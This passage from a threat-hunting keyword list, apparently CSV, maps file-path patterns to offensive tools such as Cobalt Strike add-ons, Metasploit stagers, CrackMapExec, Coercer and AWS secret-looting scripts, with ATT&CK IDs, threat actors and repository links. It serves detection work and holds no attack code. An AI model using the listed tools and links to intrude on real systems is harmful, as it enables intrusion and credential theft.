TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/clipboardinject/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/clipmon/clipmon.sln*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/clipmon/dll/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/CloakNDaggerC2*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,1,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*/clock-skew.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cloud_enum.git*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*/cloud_enum.py*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*/cloud_enum.txt*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,0,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*/cloudbrute.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/cloudsploit.git*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*/clown-newuser.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/cmd/c2.go*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*/cmd/hades/*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*/cmd_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/cmd_log.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/cmd_stager*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/cmdstager/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/cme smb *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/cme winrm *,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/cme_adcs_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/cme_shares_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/cme_spooler_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/cmedb,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/CMSeek*,offensive_tool_keyword,CMSeek,CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.,T1553 - T1580 - T1583 - T1584 ,TA0007,N/A,N/A,Web Attacks,https://github.com/Tuhinshubhra/CMSeek,1,0,N/A,N/A,10,2062,497,2023-07-03T12:17:20Z,2018-06-14T00:15:51Z -*/Cn33liz*,offensive_tool_keyword,Github Username,Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. 
known for exploitation tools dev,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cna/pipetest.cna*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*/Cneelis*,offensive_tool_keyword,Github Username,Github username Red teamer @ Outflank.Passionate about networking and cybersecurity. 
known for exploitation tools dev,N/A,N/A,N/A,N/A,POST Exploitation tools,https://twitter.com/Cneelis,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/co2-cewler/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/co2-core/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/co2-laudanum/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/co2-sqlmapper/*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*/coap-resources.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cobaltclip.c*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/cobaltclip.o*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 
- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/Cobalt-Clip/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*/cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/cobalt-strike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/cobaltstrike/c2lint*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*/CodeBuildLooter.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/coercer.egg-info*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/Coercer.git*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/Coercer.py*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z 
-*/Coercer/*.py,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*/coercer_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/CoffeeLdr.c*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*/CoffeeLdr/*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - 
